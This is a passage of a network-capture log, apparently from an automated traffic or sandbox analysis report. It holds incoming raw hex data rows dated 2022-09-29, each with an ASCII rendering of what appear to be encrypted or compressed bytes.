                                                                                                                                                2022-09-29 12:51:34 UTC11059INData Raw: e7 b7 54 b3 f5 bd a5 b0 48 11 45 4e 52 ea 74 6d bb 2e 55 bc 51 93 69 54 4a f2 4f 3d 20 c4 e7 94 19 b3 ac 8c 1f db 3b 3d d7 d6 52 16 c3 3b 61 be 8b 08 b6 9f fe 85 44 b1 ca dc b3 7c 4e 87 50 aa f7 0d 93 9a 0a fd b2 45 d0 b8 fc dd 7f 16 33 b8 74 8c 9e d2 59 bb 6e 33 66 19 d3 24 01 4c 3b b7 8e 64 03 e3 5d e1 e9 8a 70 b0 49 39 5e bc 49 cb b3 f7 28 2f a2 d3 ec d7 a8 b2 3e a0 ca ec 20 3c 27 20 49 70 a1 5b 18 3d ff 4d 37 a0 2a 54 dc 32 0f de b6 e6 31 91 56 9b ea 89 8a b5 63 71 3a 34 c0 32 8c 1c 54 67 1e 11 80 1d 43 8d fb fb 0b 7e 48 9f 10 ec f8 8b b5 ec f8 d0 73 83 6f 9f 1d 59 8e 83 24 6f 91 3b 54 52 87 86 02 b2 9c 38 6a 78 3d 13 b8 65 c3 61 d8 1b 06 84 64 8f 23 c1 64 38 54 cf 26 a6 60 fa c0 94 1c 50 2f 28 d3 63 10 44 b2 c4 ec a5 3e d8 6c 3b 84 9d 80 a8 96 16 fb
                                                                                                                                                Data Ascii: THENRtm.UQiTJO= ;=R;aD|NPE3tYn3f$L;d]pI9^I(/> <' Ip[=M7*T21Vcq:42TgC~HsoY$o;TR8jx=ead#d8T&`P/(cD>l;
                                                                                                                                                2022-09-29 12:51:34 UTC11075INData Raw: f1 db a8 f3 47 0f d8 52 f1 1b f1 7e 4d 90 09 75 7d ec 31 8a e5 00 61 e1 5a 1d cc d8 b0 63 1e 92 1a 0f 4f b7 6f 6c 5a ac ab c4 81 02 53 00 c2 3c ff 36 bd 49 b9 cd 8d e2 c2 a0 6c d9 ac 9d 6d bb 3b da 9d 5f 63 50 c9 00 b7 38 30 51 1a b7 57 8a ec fb 38 62 0b ce 4c 97 96 73 b3 2a 38 fe 51 30 e3 e0 2b d0 5d 04 df 28 6e 9c 03 3a df 34 97 35 bb 23 bb f5 05 a3 02 4d f4 7e 78 cd 6a a7 6d 5e 3d 3a 1f 41 61 b3 86 05 41 21 e7 0f 88 45 43 5c 1c 37 65 4c 1f ae 33 0e 42 cf 8d 26 78 0a 4c 77 d5 e2 71 0f bd 92 57 2b a8 ae 6d 57 13 0a b5 9b 21 44 30 00 81 f0 3d 96 94 c0 e8 85 e4 04 01 09 19 50 31 9a 20 77 6f 76 5e 4c 37 e9 65 e5 1e 51 59 02 ce 8a bb 84 9f 58 e0 1f 38 4d 2c e2 8e 9a 26 f0 23 bc 94 f0 a8 a9 8d 02 8e e7 16 ad 39 de d0 60 a1 73 70 49 5d d8 9e 13 f3 90 a6 59 86
                                                                                                                                                Data Ascii: GR~Mu}1aZcOolZS<6Ilm;_cP80QW8bLs*8Q0+](n:45#M~xjm^=:AaA!EC\7eL3B&xLwqW+mW!D0=P1 wov^L7eQYX8M,&#9`spI]Y
                                                                                                                                                2022-09-29 12:51:34 UTC11091INData Raw: 23 6d e6 77 9f 7a 2a ce f0 c9 d1 6a d4 85 2f ab e1 69 9d 92 13 13 f5 b5 77 af 50 80 ec 96 36 bd 93 d0 d1 eb 67 73 77 09 86 cb 08 52 a9 f5 64 24 c6 d0 ed c6 d6 59 03 59 f2 24 a0 d3 62 82 67 d1 30 a3 4e 22 0b 3c 20 37 f7 36 62 d0 9e 6b a3 19 b5 51 33 1e f2 b9 45 b7 c1 bb a3 9d 81 50 a1 5e 28 23 0c ad 99 27 e1 db 1f f2 ce af ed a8 f5 e8 32 7c 5e fb 3a 6c a3 54 50 fb 60 4a d5 07 3a 19 75 69 cd 00 64 3e f8 04 dc 16 28 67 3f f4 99 1f 21 0b 88 ea 81 34 44 7c f7 66 5e 6b ff 95 c6 9a 54 15 d0 7a 47 26 63 bf 30 7d e0 5c a9 06 fb e4 41 73 8b 44 ee 23 19 5d 3e 3f b5 66 c3 c7 bb 52 53 95 16 21 a3 01 8b 1b 3e 8f 60 1c 7f 6e d8 9d ed c4 97 6e a8 a8 fc 66 9b bd cb ff 1b da 4a 41 84 52 9f d1 90 f7 bf 7f 97 20 b9 89 8c 57 7b 15 5a a4 26 f9 98 b7 49 9f 7f ef a4 5c d6 05 a9
                                                                                                                                                Data Ascii: #mwz*j/iwP6gswRd$YY$bg0N"< 76bkQ3EP^(#'2|^:lTP`J:uid>(g?!4D|f^kTzG&c0}\AsD#]>?fRS!>`nnfJAR W{Z&I\
                                                                                                                                                2022-09-29 12:51:34 UTC11107INData Raw: 05 96 e2 63 67 bf 6b 91 be 91 69 95 fc 68 72 e9 a2 b9 d4 10 83 5d b7 6e 4f 1b 44 35 30 5f 1a 11 51 02 93 91 14 48 36 e2 17 03 a8 9b 4a 40 4a ae 94 d5 d9 31 bd ef 01 b7 58 df e0 72 e2 ed 87 1f f8 b2 04 5d f8 f5 9e e5 1b fb 99 c9 f9 4c 5f e5 37 84 be 09 32 12 3d 4e 07 8a 63 8b 00 22 61 37 9d eb 15 bc 07 0f 4c de ec 52 f7 05 5d 13 b7 b3 7d 57 8d 44 05 f5 fc 68 6d 38 2f 86 dd 9b c6 9a 85 65 2c 24 47 49 f4 9b 31 ff f4 3c 67 c4 49 ba 9d 34 70 b0 de 92 29 60 8c 9a bb eb b1 8e 96 19 46 10 b6 20 03 01 cd e7 94 36 07 7f a1 98 9e b5 04 6c d4 58 76 a7 bd fe 13 82 63 52 29 ac df 0e ca 89 04 6e a8 48 6d 0c 7e 44 51 43 bb 15 b0 94 de 4d c5 11 46 bb be fa b0 81 17 f9 31 29 10 39 e3 7a 42 f6 91 e0 48 24 b0 48 72 74 2b 89 a1 c2 30 98 f8 34 ad a0 df 4a b1 61 81 1b ff 5d 1a
                                                                                                                                                Data Ascii: cgkihr]nOD50_QH6J@J1Xr]L_72=Nc"a7LR]}WDhm8/e,$GI1<gI4p)`F 6lXvcR)nHm~DQCMF1)9zBH$Hrt+04Ja]
                                                                                                                                                2022-09-29 12:51:34 UTC11123INData Raw: 6c 6f 6c 6e c7 1d 70 f0 57 11 14 4d 92 43 bd 71 ea ba 28 d9 d5 83 43 a5 d8 83 ca 0f ce 06 99 70 66 7a a0 ea cf 66 4e ba 17 15 13 3e 5a 84 38 32 d9 8a d8 9e 4c ac d0 52 45 8a fd cc b9 a6 46 75 bd 97 16 a9 44 71 76 5e 06 ea 07 02 54 f2 af 5f b4 ef 22 93 f5 f8 d6 32 33 be 13 46 da 33 0c e0 b4 9c a0 34 dd 96 59 49 ec 7d 38 e2 7a 8a d8 29 fe 67 57 6e 0a 8f 89 ef 1d 74 84 7c 41 95 97 c7 0c b2 ac 11 e7 4a 3e c5 8c 09 64 10 4a 7b fa f1 f4 aa d1 b1 c6 bf 51 a9 4a 1a 09 98 62 dd 6f fa fb be 0d 2d 8f 9f 9e 28 89 6a 75 83 f1 a8 34 19 56 a5 74 58 b2 be 3e 0d 5e 1a 88 9e a8 11 54 93 b5 d1 0b 8c 32 ec 5a 23 3c b4 69 83 5c a7 c3 c4 29 45 af fe 77 fc 72 f5 b0 43 46 a8 54 60 4f a1 fe cb e6 15 ba 14 67 48 82 25 d1 f8 7c 0e 66 11 0a ca d4 de 0d 58 5d ef 3a 45 cf d1 42 53 c4
                                                                                                                                                Data Ascii: lolnpWMCq(CpfzfN>Z82LREFuDqv^T_"23F34YI}8z)gWnt|AJ>dJ{QJbo-(ju4VtX>^T2Z#<i\)EwrCFT`OgH%|fX]:EBS
                                                                                                                                                2022-09-29 12:51:34 UTC11139INData Raw: e0 7b 6b 0f cf b0 2e 69 ac 1c 29 76 e5 92 18 dd 42 58 56 52 53 50 98 4f 8c db ab cf 37 6c c2 da 89 71 59 18 e1 80 10 86 a6 0f fe c6 78 e0 c1 a7 ff 9f 11 95 da 96 cf ad d4 59 88 b2 56 ee 60 2f 10 65 39 96 9a 57 13 c4 ef ea 59 f9 5e c3 7c d6 19 92 b5 e9 6c 6d c1 5a 64 79 07 9d ff 72 2f b9 45 d9 3e cf 95 5e 95 35 94 62 69 7e a1 10 cf 4b 12 86 8c 8c 55 ad 5c 28 10 4b 6a 4f 68 d4 9e 17 1e f8 07 51 d4 a6 12 98 20 28 e2 42 11 0f 95 e1 b1 b7 73 ff f3 50 5e ee d9 b1 94 7a 4b ce 5a ba 05 86 bd b5 21 bc 26 e4 f3 6c e3 44 68 91 84 08 39 f1 0b 27 50 1a d8 e2 07 17 5d 1e de 70 f9 44 5d 06 29 e4 f1 73 46 ca 7b 5c a3 8b 45 b5 4c a3 63 38 b4 e1 1b 53 b9 73 73 85 d6 8f d8 3b 8c c2 1d e3 93 38 08 2d e5 cf 95 be dd cd 12 14 2c 88 51 ba ee 33 12 39 19 c5 58 cb 44 cc 49 03 26
                                                                                                                                                Data Ascii: {k.i)vBXVRSPO7lqYxYV`/e9WY^|lmZdyr/E>^5bi~KU\(KjOhQ (BsP^zKZ!&lDh9'P]pD])sF{\ELc8Sss;8-,Q39XDI&
                                                                                                                                                2022-09-29 12:51:34 UTC11155INData Raw: 8f 05 f6 7b e0 31 fa 0c de 7e d6 c1 02 a7 c2 90 10 60 fd 50 ae 2d e6 e6 b2 4d 1b fe fa bc 20 99 7f 42 99 e8 44 ce 47 a8 e7 40 1e 9b ff bd ef 06 0a 42 64 e4 6d a4 6b bc 59 21 4d cf 65 df 77 8a 31 c4 98 05 6b 42 99 22 ef 70 e5 da 7c 0b 28 fd 4f 6b a8 b7 50 66 67 6e 53 18 d8 bb 39 b4 ef e7 4d 43 0c 1e 28 23 7a ec 11 e0 57 f1 80 60 a9 8d 6c b4 92 cd e4 18 42 73 35 57 e6 d1 40 d4 7d b5 73 83 8b a0 ec 6e 1a f8 73 68 1e ae a0 38 03 c7 56 cb e6 85 d3 42 da 61 53 f8 cc 1a 8e f4 d2 7c 8a a0 d2 14 f3 1d 46 05 ac 72 73 f1 fd cd 60 89 ee 61 45 ed 2e 81 f7 d2 d7 60 71 22 bb 1c 78 1c 9f c2 bd d7 35 4d b6 df 2e 32 e7 fc 0d 4a 2c 37 22 02 92 c2 02 ca 11 a4 d5 6c 18 c5 67 15 e4 cd ec 37 88 0e d6 7e b6 22 99 96 ea 1b 8c f7 ec af 6f 9e 98 bc 06 10 9d 4a 42 57 32 fb 70 20 64
                                                                                                                                                Data Ascii: {1~`P-M BDG@BdmkY!Mew1kB"p|(OkPfgnS9MC(#zW`lBs5W@}snsh8VBaS|Frs`aE.`q"x5M.2J,7"lg7~"oJBW2p d
                                                                                                                                                2022-09-29 12:51:34 UTC11171INData Raw: b2 b7 5c 0a 98 f4 69 87 47 8c ce 8d cc 16 f2 53 0f 24 04 24 1a 14 ff 44 17 1b d8 3a 50 11 68 26 50 2c 37 88 51 2e 32 bd 04 cb e2 31 e1 ff 3d c5 c7 68 e3 1b 0b 84 f0 19 33 44 6d 72 59 69 d6 d5 35 d1 e5 01 6a a7 43 1b ef b8 09 b4 26 38 3b 22 44 44 32 50 c5 2c 96 4e c1 a1 b5 1a 29 ed a4 8f 23 44 48 48 e0 7a ce 19 84 ee 2b 7e ea 56 01 f9 31 d2 7d 56 2c 70 f4 89 11 a7 6c a6 30 2d 41 27 44 2f 75 48 d2 12 59 3c f3 16 05 b8 96 72 65 9b de 75 a5 17 0e ad b0 a2 3b 0d a9 80 2b 08 4d 2f ca 49 90 2f e1 42 8a 8c 66 cc a4 42 10 02 f4 30 8b 2f 4d 96 7a be 5d 2a 75 90 78 50 29 be 6d fa 0b a5 68 f0 cc 0a e3 65 99 65 e9 5f 0d 0b 87 dd e7 20 5b d0 67 87 2f c3 d9 e9 7f c3 ff 55 15 fc 15 10 a0 a4 2b 5f 33 bc b0 75 d5 9e 5c bf a6 a5 12 a5 a3 a3 a2 d2 f6 4f 43 66 ed 40 cc 50 0e
                                                                                                                                                Data Ascii: \iGS$$D:Ph&P,7Q.21=h3DmrYi5jC&8;"DD2P,N)#DHHz+~V1}V,pl0-A'D/uHY<reu;+M/I/BfB0/Mz]*uxP)mhee_ [g/U+_3u\OCf@P
                                                                                                                                                2022-09-29 12:51:34 UTC11187INData Raw: 38 cf 65 54 48 97 73 ab 8c 02 e9 c2 36 2d d5 22 7c f2 94 dc 49 66 20 a3 98 ca a3 84 a5 a1 8e de 79 18 90 c5 18 f0 cd 4a 67 94 f0 14 90 13 cd 0f 0d 6d 5e 1f 54 03 7a 49 e1 65 ee 3f 99 4c dc 64 99 78 a5 6b 44 3a 99 31 b8 c1 7a 6c 74 a8 eb 97 a2 53 c4 2a 7e 22 00 89 18 83 10 0d d6 66 43 c7 e0 f8 e6 65 69 92 79 1f f4 7a d4 11 32 71 79 bb 29 cf 9c 40 d4 9b d2 ff 34 75 35 45 ac 98 87 76 0d 48 d0 5b 34 4f 4f 95 5e 0e 7e 25 3e 58 c6 ac c2 5a 87 2b 66 b8 85 77 ff 56 c6 1c 22 5e 1b 02 dd c4 a3 78 a0 aa c2 10 b4 ae a6 d4 cb 21 c2 fb fb d7 d4 b8 c3 fe a2 04 67 78 6d b0 98 d1 02 96 b1 c3 79 50 d2 0a 59 c0 1e cf c6 ca a2 21 b2 99 24 e2 a9 6c 29 48 6d 78 8c 9d 6e 90 7c 8e f6 8a bc 69 8a 50 ee c9 ea 72 08 67 53 1b 4a dc 93 b5 3b 13 cc 9d d8 4f 4e d0 4b 09 39 5e 4c 37 0b
                                                                                                                                                Data Ascii: 8eTHs6-"|If yJgm^TzIe?LdxkD:1zltS*~"fCeiyz2qy)@4u5EvH[4OO^~%>XZ+fwV"^x!gxmyPY!$l)Hmxn|iPrgSJ;ONK9^L7
                                                                                                                                                2022-09-29 12:51:34 UTC11203INData Raw: c7 97 87 62 4a da a4 8d 4c d6 d4 5a 9f ca 64 7f 97 b1 2d c1 ee fe 5a 69 67 cd 3d 61 c9 92 4d 18 bc 27 c9 b7 ce c8 f1 4d a8 ed 48 f4 32 09 93 18 b6 c9 d9 3d f8 4f f1 34 e1 8a 52 e4 32 c6 9a 2b 50 e9 29 3b 7c 77 02 ae 99 8d fe d0 2d d2 b3 24 80 aa b9 e3 26 80 c1 71 05 bb 33 ce c4 6e c1 d7 71 df 32 90 73 9e 8c 85 8f 1b 68 18 64 cc b9 89 70 6a 75 df dd 86 56 65 ed b7 c3 b8 dd 71 50 98 40 b1 e0 38 77 ee 14 35 d5 34 3d 0a 4e 1d f5 d3 88 36 7f 41 5e c6 2b 7c 5e 71 b0 f7 fe 95 2e df c2 f1 b0 c0 6f 2e 0f 9e c3 26 e2 8d 7d 91 d8 4f 9c a7 79 bf 2d a0 1f 68 b4 03 5a 66 4d 61 47 47 03 1e ef ea f9 93 6d b1 3e 6b e9 57 90 31 ae ad 22 70 8b 4b 3b 87 97 cb 32 73 49 6a 3f d7 0a aa 32 51 6d c9 ff 4f 1e 63 62 31 72 c9 f9 2d 67 ba 06 c5 a4 08 80 ee ac 61 13 80 17 42 ff ec e4
                                                                                                                                                Data Ascii: bJLZd-Zig=aM'MH2=O4R2+P);|w-$&q3nq2shdpjuVeqP@8w54=N6A^+|^q.o.&}Oy-hZfMaGGm>kW1"pK;2sIj?2QmOcb1r-gaB
                                                                                                                                                2022-09-29 12:51:34 UTC11219INData Raw: d3 e4 3a 34 bd da 06 2e 7d 06 41 e0 ed ee 33 d4 97 86 a6 a2 0c 16 cb 59 60 2c c8 00 09 eb dc b8 e8 32 4d fd 4d bc 7d 4a 58 d5 e5 38 87 87 7e 3d 84 24 33 e2 84 b1 12 41 1f 94 28 48 4a 61 15 3c a6 dc 4a 25 88 58 1a 48 eb d7 5e 67 cf f4 3d 12 59 7f 22 23 0c 89 22 ab b8 4b 62 a7 47 54 52 4e f0 cf 18 e7 41 1d ef 73 13 35 b8 82 43 99 d6 b2 bd 99 c6 e0 8e a7 01 a9 4f 8c 6a 87 5c 84 1b af 75 9e 21 7a dd 8d 6f 61 28 76 ce 6c 25 e1 0b 40 9e 58 39 9e 9f db 28 02 1c 32 47 e2 67 30 a8 73 ed 56 5e d3 5d 0b 5e e8 a6 11 38 70 82 0b fe 3f bb 91 5a ad 5b fb b4 d1 8c 1b 56 3e 2d 7b ea 13 ec 0a 5a 6d e6 0d 2e 0b 17 13 43 14 a6 80 3e 7c a8 39 12 54 a8 ac 85 dd c2 ab ae 0b 96 62 18 21 ea 9b 97 ba 74 f9 fe c8 1a 68 32 e5 13 5f b2 2c d7 db 76 54 80 8a ea 1b b0 38 38 a3 59 50 e7
                                                                                                                                                Data Ascii: :4.}A3Y`,2MM}JX8~=$3A(HJa<J%XH^g=Y"#"KbGTRNAs5COj\u!zoa(vl%@X9(2Gg0sV^]^8p?Z[V>-{Zm.C>|9Tb!th2_,vT88YP
                                                                                                                                                2022-09-29 12:51:34 UTC11235INData Raw: 2b 1e 39 23 c2 52 35 c3 21 7b 97 9f 93 bb 05 3c 6d 55 fb 09 30 63 ab e9 ef 8a b2 be e1 62 b3 e5 8d dd f1 5d e5 f2 86 c9 07 4d 98 4a 72 f3 80 01 8c 79 9c 3c 35 2c 2c 30 99 af a7 f4 e4 35 17 b8 db 2b 12 62 6f 6c 6e 21 33 13 cf 4d 4f cf 22 80 0c 27 ca ef 90 c7 ce 1b 91 2d 1d 4b 50 22 d5 45 13 74 54 d4 5d 68 b6 2b e4 da 5d 47 c8 ad be ac e7 12 2d 7c 58 09 05 b1 33 ca 73 0d 84 1a 18 8e 69 f8 dc dd b8 50 a6 e3 53 59 c1 29 1b 3e 62 92 a0 f4 6c 4e 37 86 bc 0c d2 45 b5 92 91 08 43 06 aa 2d 0a 48 c5 8a 26 c4 0f ec 60 08 d8 90 94 91 c2 6b 29 0d 0d 3b ad 6f 22 b8 4f 86 ce d0 65 bb 20 d1 90 12 f7 20 10 37 ef 73 69 a4 cc 93 9f 52 6d 0c b4 35 e6 68 aa f2 62 06 35 11 16 e3 9f 0e b7 21 2e 38 51 9c 07 e2 96 d3 cc 6c b2 b7 a4 58 22 67 59 66 74 a4 6e 53 d3 08 5e 1c 5e 82 8d
                                                                                                                                                Data Ascii: +9#R5!{<mU0cb]MJry<5,,05+boln!3MO"'-KP"EtT]h+]G-|X3siPSY)>blN7EC-H&`k);o"Oe 7siRm5hb5!.8QlX"gYftnS^^
                                                                                                                                                2022-09-29 12:51:34 UTC11251INData Raw: 17 f2 de 69 fd d9 f6 39 6a 5d 78 b0 b6 95 8c f9 f5 93 bb f4 f3 ea e9 30 57 f6 f5 59 71 ec 6e cf ea 1b 4b e1 26 a6 f8 3a 9c 4a 7a f0 69 ac 9f b1 ff 42 8b 37 9d 4e ba 9b 42 9d 28 4a 81 2c 50 71 9c ed 6b 6e 52 0b dc c7 40 8b 23 02 04 d9 70 a9 23 38 38 d4 b3 2a 29 3c 82 2f 26 39 f3 a3 c7 66 31 77 9a 28 c6 0a 12 ae d6 ea fc 9a 80 43 24 bf d6 f3 1c bb 97 05 94 83 39 13 13 77 e9 d4 3b 25 d4 a5 07 ac da a2 36 80 ba fe 9e 81 e8 a5 c2 0e 44 dd a0 5c 01 37 b3 ff b1 a7 87 b5 ec a8 b7 7f e8 d1 c3 6f 04 17 ff 69 05 9a d4 9d 40 40 03 ab 26 9d 16 0b f1 6b 65 07 99 b6 f6 6a 07 e2 8d fc 25 3e 62 37 8a d2 4f b5 2e 3e bd e2 d6 3f 4e ed a6 60 3d 9c 6f b0 57 64 73 01 97 e0 3a ea f1 ee 81 68 43 33 7d d8 dd 12 05 dd 43 bb ba 6c b2 a9 70 68 c9 57 77 fe c8 7e 66 4a 2f 5c 14 48 79
                                                                                                                                                Data Ascii: i9j]x0WYqnK&:JziB7NB(J,PqknR@#p#88*)</&9f1w(C$9w;%6D\7oi@@&kej%>b7O.>?N`=oWds:hC3}ClphWw~fJ/\Hy
                                                                                                                                                2022-09-29 12:51:34 UTC11267INData Raw: 6b 78 b8 8f 6c fb 6a 59 23 1a 28 e4 fe 04 d7 58 27 91 00 3b 98 fe 02 f0 2f 18 a4 71 5a df e1 80 2e 0d 51 22 5f c6 57 24 bc 2c 42 a1 75 c9 31 40 84 54 7a 2f d1 27 c9 4a 50 0c bc 57 a0 9f 2f 4f a1 43 ee 1e 6e 03 4e 75 27 1f 7a ff 66 08 33 74 31 36 64 11 b3 2e 30 5b 9d f5 69 b1 27 38 64 61 be 5c 1a 94 53 a4 c4 5c d5 4d 11 5b e4 ef ba 13 02 67 a3 43 df d1 d2 73 d3 5b 19 56 f3 cf ce a7 58 05 b5 45 5b 27 2d a0 17 78 91 c4 61 f6 4c 3c 2d 54 a9 11 6d 34 25 4a f4 1c 86 46 18 76 1d 33 f6 f0 b2 c3 dc eb da 7c a4 17 05 78 63 92 b6 79 d6 21 c6 a1 cb 79 5d 31 ee 1c dd 12 4f 45 0a 8c e9 61 9c 7c 7b ef b9 2b be 7d cf 82 ad bc c6 ee 6a 31 ff 17 dc 49 7b 86 4e ba 78 d9 e9 b4 78 5d ac 61 34 f4 c9 64 2e 79 89 e1 88 86 75 f9 14 63 7b 49 25 58 86 72 35 f1 f4 73 29 50 2a 01 73
                                                                                                                                                Data Ascii: kxljY#(X';/qZ.Q"_W$,Bu1@Tz/'JPW/OCnNu'zf3t16d.0[i'8da\S\M[gCs[VXE['-xaL<-Tm4%JFv3|xcy!y]1OEa|{+}j1I{Nxx]a4d.yuc{I%Xr5s)P*s
                                                                                                                                                2022-09-29 12:51:34 UTC11269INData Raw: 3f 72 14 bd 16 4f 04 8a 65 3a 84 b6 26 9d 5e 92 c9 66 b4 0b fe a5 df c7 ca e8 8c c8 9d 2c d4 07 c6 c9 ee 5e 9f 9d ab 60 70 9c 6c a5 4a f2 b5 1a ba f4 73 ed 22 1b e5 70 ff f2 b1 5a 79 07 31 22 c5 ed 89 fa 0a bf af 27 0d 90 92 8b 06 dc bd 9f db c2 91 2c ad a2 68 c0 f0 a3 1c ed c1 cf 28 1e 72 f8 77 c0 46 67 03 c0 2c a7 7c cd 80 bd 14 05 82 0c 5d 4d d4 19 2e af a4 0c ee d0 b4 cb 16 e2 bf 81 38 84 4f d1 59 c1 d8 c0 8e ef e0 28 cc ee 65 11 d4 69 05 ac 12 f4 e4 de 04 64 46 50 6c df 41 2f 87 78 57 fa 32 e9 d6 fe be 12 0b dc 47 d3 34 d1 a4 a4 a5 88 0f ac 09 53 b0 44 2c 39 da 9e 2e 80 e5 34 d1 a0 3a a1 f5 2b ca b8 8a ce f5 21 03 f9 fa 69 f8 44 a6 b0 7b cf 76 62 b8 74 4e a1 a6 1b 9f ca 7f de 2d 18 18 9b 16 3b 72 d1 68 cb 6f 5a fc cf d2 fb eb be 22 2d 9c e2 73 d8 e6
                                                                                                                                                Data Ascii: ?rOe:&^f,^`plJs"pZy1"',h(rwFg,|]M.8OY(eidFPlA/xW2G4SD,9.4:+!iD{vbtN-;rhoZ"-s
                                                                                                                                                2022-09-29 12:51:34 UTC11285INData Raw: 07 5d 2b b2 80 12 18 bc 19 a0 e8 bc 08 04 5a e4 e8 52 5f 8d 80 41 54 77 3b 30 0e 8c 7c 99 88 7a a9 6b 97 ca 33 d0 d6 b0 ae c5 30 4a f2 7d d0 cf 41 1c 9b 64 e9 11 20 d8 6d eb bc fe 70 7f 4b 4f 7a bd cb 7a eb 5e 81 bd 13 85 57 2b 39 42 45 29 f2 44 5d 98 ed d3 c3 df 34 ee 98 1c 48 b2 bb 9f ee 56 f0 d8 1c 6f 8a 8b 50 fb fc 2f b4 29 59 1e f5 f3 d1 03 3e bf 89 c3 07 85 68 3d 6b ee 0d 10 fe 4b 2a 98 b4 84 d9 2c bb 1c 4f 9b f5 fd a3 0c 1b 8d ba f8 6c 88 d1 e6 17 ab 40 1f ac 29 56 fc d9 4f 8e cb b6 a3 3f 61 91 fa 7a fb ca 9c 38 da 7c be 52 d3 7f 62 92 70 92 ba ee a9 ae ed 0c fd 19 2b 88 e1 96 74 a4 43 38 3c ca 8f ff cb 94 9e e9 ed 1f 29 28 80 fc 03 76 b7 8f 57 70 3e f8 46 0f 71 27 f1 2f fc ed ea 9c 96 5a c2 ac 34 73 ea e8 c9 bb c2 36 3b 53 48 10 e0 7c a7 67 32 7e
                                                                                                                                                Data Ascii: ]+ZR_ATw;0|zk30J}Ad mpKOzz^W+9BE)D]4HVoP/)Y>h=kK*,Ol@)VO?az8|Rbp+tC8<)(vWp>Fq'/Z4s6;SH|g2~
                                                                                                                                                2022-09-29 12:51:34 UTC11301INData Raw: 23 67 0e fa 41 51 7d 97 fc a8 c9 06 61 70 47 e1 89 73 57 9c 4b 47 fd ea 89 34 7c 12 0d 19 f5 38 2f e7 dc 35 e9 dd bc 5c 7b c8 56 33 7d 6c c9 cf a0 9c 91 41 4f a3 8e d0 df f7 68 cd 08 42 35 6a e2 73 e1 dc f2 9f 8e 02 de e4 8a 83 72 72 73 b7 3a c0 84 e9 ce 33 f6 14 9f ef f0 79 34 c4 82 83 53 c0 91 c3 d9 e0 53 b6 b6 bb dd 0d c5 03 86 b3 b5 84 fa 41 b2 fb 67 50 65 6f 03 36 70 98 5b 2e 5e 1b d5 14 18 68 68 b2 f1 8e 28 8a 26 f4 ba ac 6a f4 dd 83 34 3a 05 3f fc d1 75 ba 2d 93 36 a1 86 49 74 5a d0 ed c3 0a f7 75 bc 63 a1 43 c7 51 6b 74 ee 82 1f d7 71 e4 4a 06 46 bf 6d 6a 09 9e 08 e4 f3 15 38 59 fd 20 53 3a d0 89 38 b6 0f d2 67 06 30 74 3d 99 05 6e 3b 60 3a 78 a1 9f 79 89 89 7e be 33 f7 2c f6 9d 28 06 ab a8 96 40 c2 90 04 57 61 cb cc 01 9f b6 4b 33 53 5f 7e df 3c
                                                                                                                                                Data Ascii: #gAQ}apGsWKG4|8/5\{V3}lAOhB5jsrrs:3y4SSAgPeo6p[.^hh(&j4:?u-6ItZucCQktqJFmj8Y S:8g0t=n;`:xy~3,(@WaK3S_~<
                                                                                                                                                2022-09-29 12:51:34 UTC11304INData Raw: 65 c9 f3 74 6f 8d 98 6e 1e bb b9 d1 60 fa a3 4d cb f0 1a cd 0c 43 51 24 de 45 2c 12 af 48 7d 9d a1 2d 36 ec 80 cc ee 40 f2 1e 02 fd 25 1d 28 d1 bd b8 fa e7 e0 07 1b dd cb c5 c4 85 7d 42 49 f7 0e 63 a0 59 07 1f 40 82 c5 8d 55 64 97 5f f3 6b b1 ff e8 4b 55 cf 34 11 99 af 88 4e ca 38 f2 b9 87 34 4b 2d 97 c0 8e d2 f8 bd e2 09 eb 2e ad 36 a3 14 1a 8a 6d ec 7f 37 e9 0d e5 d2 28 3b 2c 87 b3 fb 70 57 7e 2b 90 52 90 c3 fb 19 d6 c9 11 7a 33 4d cd d8 bf df 81 4c a9 a0 9f 1b 49 3e e7 26 86 e4 9b ab e0 34 92 49 3f f9 64 52 85 c4 72 e4 17 7d 98 14 c3 33 8d dc 83 e1 fd 86 87 49 e7 53 90 5a ba a4 76 57 ab 34 44 32 f5 ef e5 40 ff 16 48 57 fc 46 0b 3e a0 3f 8f 74 15 1c 5b 13 24 b2 ac a9 7f 37 a6 11 e6 63 5e a2 8c 68 f8 78 15 c4 4a 2e 88 b2 27 cc e6 d6 7b cb f3 6e 83 75 41
                                                                                                                                                Data Ascii: eton`MCQ$E,H}-6@%(}BIcY@Ud_kKU4N84K-.6m7(;,pW~+Rz3MLI>&4I?dRr}3ISZvW4D2@HWF>?t[$7c^hxJ.'{nuA
                                                                                                                                                2022-09-29 12:51:34 UTC11320INData Raw: ae 22 fb d9 fd 0e 46 a9 53 08 ff b2 98 a5 2b 01 31 33 96 72 5f c2 68 d3 4c 29 6d 4f 24 ab a3 8c 70 96 c9 2f 56 0f 45 8c 99 12 c8 99 04 19 86 b4 fc 19 9a 88 e2 c2 13 8b 7e 0a 04 7b cc e1 05 80 47 83 62 15 d9 1c f6 67 bd a6 c4 aa 1b 02 44 2d 67 3f 7c 25 a5 eb 90 62 17 f1 91 28 fd 5a 9f ff 9c ef 97 1f 85 0f c9 60 b3 bb e7 b6 d1 31 97 71 8e 76 9c 65 78 b7 6a 8a 45 54 cc c6 c0 29 4f 5f 3c 39 82 a8 72 25 2b 78 38 94 2b 9e b9 0f 2f 09 f3 1b 67 59 d0 5f 24 6e b5 93 d0 4d b9 e8 43 3d 89 3a 4a 8e c0 2d bf bf 6c ee 7c 78 62 4b 1b eb 45 b7 fb ae ac 75 01 a5 0b 5d 18 33 1a 5d d7 53 d9 34 e0 a1 fd bc 16 ee fd c7 af ee 67 d4 77 5b b5 60 66 3b fa 43 be fa 0d 31 89 b0 80 64 a1 ad 38 60 91 6a 7f 3e 78 68 ce 18 c9 39 52 cf 97 ee 95 52 9f da a8 59 28 d0 e3 b2 9b f9 70 92 20
                                                                                                                                                Data Ascii: "FS+13r_hL)mO$p/VE~{GbgD-g?|%b(Z`1qvexjET)O_<9r%+x8+/gY_$nMC=:J-l|xbKEu]3]S4gw[`f;C1d8`j>xh9RRY(p
